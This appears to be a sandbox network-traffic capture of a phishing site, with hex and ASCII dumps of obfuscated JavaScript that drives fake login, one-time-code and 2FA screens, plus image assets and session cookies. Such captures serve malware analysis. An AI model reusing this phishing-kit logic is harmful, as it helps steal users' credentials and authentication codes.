                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 2f 30 78 36 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 32 36 61 29 29 2f 30 78 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 31 62 38 29 29 2f 30 78 38 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 31 34 38 29 29 2f 30 78 39 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 66 63 29 29 2f 30 78 61 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 32 35 35 29 29 2f 30 78 62 29 3b 69 66 28 5f 30 78 31 30 32 34 32 33 3d 3d 3d 5f 30 78 33 39 65 61 32 38 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 66 32 61 37 34 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 66 32 61 37 34 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 61 31 61 30
                                                                                                                                              Data Ascii: /0x6+parseInt(_0x4609ca(0x26a))/0x7*(-parseInt(_0x4609ca(0x1b8))/0x8)+parseInt(_0x4609ca(0x148))/0x9+parseInt(_0x4609ca(0xfc))/0xa*(parseInt(_0x4609ca(0x255))/0xb);if(_0x102423===_0x39ea28)break;else _0x3f2a74['push'](_0x3f2a74['shift']());}catch(_0x1a1a0
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 30 78 31 30 36 29 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 31 35 33 29 29 5b 5f 30 78 33 65 38 35 61 34 28 30 78 31 36 63 29 5d 28 29 29 3b 69 66 28 76 69 65 77 21 3d 3d 5f 30 78 33 65 38 35 61 34 28 30 78 31 34 61 29 26 26 76 69 65 77 21 3d 3d 5f 30 78 33 65 38 35 61 34 28 30 78 31 38 36 29 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 65 38 35 61 34 28 30 78 31 33 37 29 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 31 34 33 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 32 31 62 29 29 21 3d 3d 6e 75 6c 6c 29 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 27 73 65 63 74 69 6f 6e 5f 27 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d
                                                                                                                                              Data Ascii: 0x106)](_0x3e85a4(0x153))[_0x3e85a4(0x16c)]());if(view!==_0x3e85a4(0x14a)&&view!==_0x3e85a4(0x186)){if(document[_0x3e85a4(0x137)](_0x3e85a4(0x143)+view)['querySelector'](_0x3e85a4(0x21b))!==null)document['getElementById']('section_'+view)['querySelector']
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 65 38 35 61 34 28 30 78 31 33 37 29 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 31 34 33 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 27 23 62 74 6e 5f 76 65 72 69 66 79 6f 74 70 5f 6c 69 76 65 27 29 5b 27 63 6c 69 63 6b 27 5d 28 29 3b 7d 7d 7d 7d 7d 7d 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 76 61 6c 69 64 61 74 65 64 69 67 69 6e 70 28 5f 30 78 32 31 33 33 62 32 29 7b 63 6f 6e 73 74 20 5f 30 78 35 34 33 37 62 66 3d 5f 30 78 31 65 66 30 31 39 3b 5f 30 78 32 31 33 33 62 32 5b 5f 30 78 35 34 33 37 62 66 28 30 78 31 30 66 29 5d 3d 5f 30 78 32 31 33 33 62 32 5b 5f 30 78 35 34 33 37 62 66 28 30 78 31 30 66 29 5d 5b 27 72 65 70 6c 61 63 65 27 5d 28 2f 5c 44 2f 67 2c 27 27 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 69 6e 67 61 6e
                                                                                                                                              Data Ascii: e85a4(0x137)](_0x3e85a4(0x143)+view)['querySelector']('#btn_verifyotp_live')['click']();}}}}}}}});function validatediginp(_0x2133b2){const _0x5437bf=_0x1ef019;_0x2133b2[_0x5437bf(0x10f)]=_0x2133b2[_0x5437bf(0x10f)]['replace'](/\D/g,'');}function loadingan
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 35 64 36 30 65 30 28 30 78 61 34 29 5d 5b 5f 30 78 35 64 36 30 65 30 28 30 78 64 64 29 5d 3d 5f 30 78 35 64 36 30 65 30 28 30 78 31 62 39 29 2b 5f 30 78 31 66 66 30 64 31 2b 27 73 5c 78 32 30 27 2b 5f 30 78 33 33 39 65 33 34 2b 27 27 29 2c 5f 30 78 35 63 38 32 66 61 3d 3d 30 78 32 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 64 36 30 65 30 28 30 78 31 33 37 29 5d 28 5f 30 78 35 64 36 30 65 30 28 30 78 31 34 33 29 2b 5f 30 78 32 35 66 38 64 35 29 5b 5f 30 78 35 64 36 30 65 30 28 30 78 31 30 36 29 5d 28 5f 30 78 35 64 36 30 65 30 28 30 78 31 38 64 29 29 5b 27 73 74 79 6c 65 27 5d 5b 5f 30 78 35 64 36 30 65 30 28 30 78 64 64 29 5d 3d 5f 30 78 35 64 36 30 65 30 28 30 78 31 37 66 29 2b 5f 30 78 31 66 66 30 64 31 2b 27 73 5c 78 32 30 27 2b 5f 30 78 33 33 39
                                                                                                                                              Data Ascii: 5d60e0(0xa4)][_0x5d60e0(0xdd)]=_0x5d60e0(0x1b9)+_0x1ff0d1+'s\x20'+_0x339e34+''),_0x5c82fa==0x2&&(document[_0x5d60e0(0x137)](_0x5d60e0(0x143)+_0x25f8d5)[_0x5d60e0(0x106)](_0x5d60e0(0x18d))['style'][_0x5d60e0(0xdd)]=_0x5d60e0(0x17f)+_0x1ff0d1+'s\x20'+_0x339
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 32 29 5d 29 2c 63 68 65 63 6b 65 72 72 6f 72 64 65 73 63 28 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 63 29 2c 30 78 32 2c 5f 30 78 33 37 39 64 35 65 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 62 37 29 5d 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 33 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 61 70 70 27 29 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 35 29 5d 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 62 33 29 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 33 37 29 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 31 64 64 29 29 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 35 29 5d 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 32 36 29 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 76 69
                                                                                                                                              Data Ascii: 2)]),checkerrordesc(_0x28e288(0x26c),0x2,_0x379d5e[_0x28e288(0x1b7)]),document[_0x28e288(0x137)]('section_authapp')[_0x28e288(0x265)][_0x28e288(0x1b3)]('d-none'),document[_0x28e288(0x137)](_0x28e288(0x1dd))[_0x28e288(0x265)][_0x28e288(0x226)]('d-none'),vi
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 61 69 6e 5f 74 6f 6f 6d 61 6e 79 61 74 74 65 6d 70 74 73 27 29 5b 5f 30 78 31 32 62 37 66 64 28 30 78 61 34 29 5d 5b 5f 30 78 31 32 62 37 66 64 28 30 78 31 66 33 29 5d 3d 27 62 6c 6f 63 6b 27 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 32 62 37 66 64 28 30 78 31 33 37 29 5d 28 5f 30 78 31 32 62 37 66 64 28 30 78 31 37 63 29 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 31 32 62 37 66 64 28 30 78 31 38 64 29 29 5b 5f 30 78 31 32 62 37 66 64 28 30 78 61 34 29 5d 5b 5f 30 78 31 32 62 37 66 64 28 30 78 64 64 29 5d 3d 27 73 68 6f 77 2d 66 72 6f 6d 2d 72 69 67 68 74 5c 78 32 30 30 2e 35 73 27 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 32 62 37 66 64 28 30 78 31 33 37 29 5d 28 5f 30 78 31 32 62 37 66 64 28 30 78 31 37 63 29 29 5b 5f 30 78 31 32
                                                                                                                                              Data Ascii: ain_toomanyattempts')[_0x12b7fd(0xa4)][_0x12b7fd(0x1f3)]='block',document[_0x12b7fd(0x137)](_0x12b7fd(0x17c))['querySelector'](_0x12b7fd(0x18d))[_0x12b7fd(0xa4)][_0x12b7fd(0xdd)]='show-from-right\x200.5s',document[_0x12b7fd(0x137)](_0x12b7fd(0x17c))[_0x12
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 61 70 70 5f 6c 69 76 65 27 29 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 35 29 5d 5b 27 74 6f 67 67 6c 65 27 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 32 35 66 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 33 37 29 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 31 64 33 29 29 5b 27 63 6c 61 73 73 4c 69 73 74 27 5d 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 32 36 29 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 32 35 66 29 29 2c 76 69 65 77 3d 5f 30 78 32 38 65 32 38 38 28 30 78 32 30 38 29 3b 7d 69 66 28 5f 30 78 33 37 39 64 35 65 5b 27 6d 65 73 73 61 67 65 27 5d 3d 3d 5f 30 78 32 38 65 32 38 38 28 30 78 32 31 38 29 29 7b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                                              Data Ascii: 7)]('section_authapp_live')[_0x28e288(0x265)]['toggle'](_0x28e288(0x25f)),document[_0x28e288(0x137)](_0x28e288(0x1d3))['classList'][_0x28e288(0x226)](_0x28e288(0x25f)),view=_0x28e288(0x208);}if(_0x379d5e['message']==_0x28e288(0x218)){document['getElementB
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 30 2c 5f 30 78 34 35 61 66 37 38 29 3b 7d 2c 30 78 37 64 30 29 2c 5f 30 78 37 63 30 64 63 39 5b 27 6d 65 73 73 61 67 65 27 5d 3d 3d 27 64 75 70 6c 69 63 61 74 65 5c 78 32 30 72 65 71 75 65 73 74 27 26 26 28 77 61 69 74 32 66 61 63 61 6e 63 65 6c 3d 30 78 31 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 74 72 79 61 67 61 69 6e 6c 61 74 65 72 27 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 36 35 29 5d 5b 27 63 6f 6e 74 61 69 6e 73 27 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 32 35 66 29 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 31 37 63 29 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 30 36 29 5d 28 5f 30 78
                                                                                                                                              Data Ascii: 0,_0x45af78);},0x7d0),_0x7c0dc9['message']=='duplicate\x20request'&&(wait2facancel=0x1,document[_0x11576f(0x137)]('section_tryagainlater')[_0x11576f(0x265)]['contains'](_0x11576f(0x25f))&&(document[_0x11576f(0x137)](_0x11576f(0x17c))[_0x11576f(0x106)](_0x
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 32 31 29 29 5b 27 63 6c 61 73 73 4c 69 73 74 27 5d 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 32 36 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 32 35 66 29 29 2c 76 69 65 77 3d 27 66 69 6e 61 6c 27 29 2c 5f 30 78 37 63 30 64 63 39 5b 27 6d 65 73 73 61 67 65 27 5d 3d 3d 5f 30 78 31 31 35 37 36 66 28 30 78 64 35 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 31 65 61 29 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 36 35 29 5d 5b 27 74 6f 67 67 6c 65 27 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 31 32 31 29 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 36 35 29 5d 5b 5f
                                                                                                                                              Data Ascii: 21))['classList'][_0x11576f(0x226)](_0x11576f(0x25f)),view='final'),_0x7c0dc9['message']==_0x11576f(0xd5)&&(document[_0x11576f(0x137)](_0x11576f(0x1ea))[_0x11576f(0x265)]['toggle']('d-none'),document[_0x11576f(0x137)](_0x11576f(0x121))[_0x11576f(0x265)][_


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              72192.168.2.1849839188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:01 UTC1382OUTGET /klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:01 UTC1070INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:01 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rVGkTl0c29sV6UoRGnDNC87MLo1uAsD8Y9zpMeNMzWHp0Gc2t9OV3UCHQCRVyiB7D7DJsLgj%2FrJXMOzBimfBGE4rZgGJoecrl66L4%2FN81sf2kg0nBn1t105Er0Nkeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12521&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2301&delivery_rate=226038&cwnd=252&unsent_bytes=0&cid=f04c995933d6c2d2&ts=165&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6456c8ac3e74b-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18855&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1960&delivery_rate=152188&cwnd=32&unsent_bytes=0&cid=956092f5ef084a8f&ts=761&x=0"
                                                                                                                                              2024-11-06 15:56:01 UTC299INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                                                                                              Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 42 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 34 38 2e 36 20 31 38 38 35 2e 32 63 36 33 31 2e 39 32 20 30 20 31 31 34 34 2e 32 2d 34 31 37 2e 34 35 20 31 31 34 34 2e 32 2d 39 33 32 2e 34 53 32 31 38 30 2e 35 32 20 32 30 2e 34 20 31 35 34 38 2e 36 20 32 30 2e 34 20 34 30 34 2e 34 20 34 33 37 2e 38 35 20 34 30 34 2e 34 20 39 35 32 2e 38 73 35 31 32 2e 32 37 36 20 39 33 32
                                                                                                                                              Data Ascii: .6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932
                                                                                                                                              2024-11-06 15:56:01 UTC203INData Raw: 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 45 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 30 20 30 68 31 39 32 30 76 31 30 38 30 48 30 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 2f 64 65 66 73 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                              Data Ascii: stop stop-color="#d83b01" stop-opacity=".75"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><clipPath id="E"><path fill="#fff" d="M0 0h1920v1080H0z"/></clipPath></defs></svg>
                                                                                                                                              2024-11-06 15:56:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              73192.168.2.1849844188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:01 UTC1391OUTGET /klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:02 UTC1047INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:02 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 1298
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnDsY8XfgRF0dY5amOgHc5BofSNabw82oV134ycSS%2BeFusUGY5A13%2B7P4jrjChleSVFQb8gj83bre7nA79rz8vUlPpguWEc6injAOrCVrLxPMEs4hP3p1Y6zdBdttg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12460&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2314&delivery_rate=232928&cwnd=72&unsent_bytes=0&cid=4942a51daa600495&ts=164&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6457058a4461e-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1918&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1969&delivery_rate=1489711&cwnd=251&unsent_bytes=0&cid=9fdf52b71ce0f814&ts=773&x=0"
                                                                                                                                              2024-11-06 15:56:02 UTC322INData Raw: 52 49 46 46 0a 05 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 6b 00 00 17 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFWEBPVP8X0kICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:02 UTC976INData Raw: 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 58 02 00 00 0d a0 5c 6d 7b dc b6 7a b3 f4 ca ff 89 b7 19 d0 01 ff 54 20 b8 02 51 15 90 aa 80 52 05 8c 2a 90 58 81 c9 0a 0c 55 60 a8 82 40 1d e0 0e db f8 fc 59 79 79 07 8a 3c 71 e6 ec 22 62 02 fe 61 fa f1 e6 e3 4b a6 5f f0 bb d1 a9 04 fb
                                                                                                                                              Data Ascii: o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHX\m{zT QR*XU`@Yyy<q"baK_


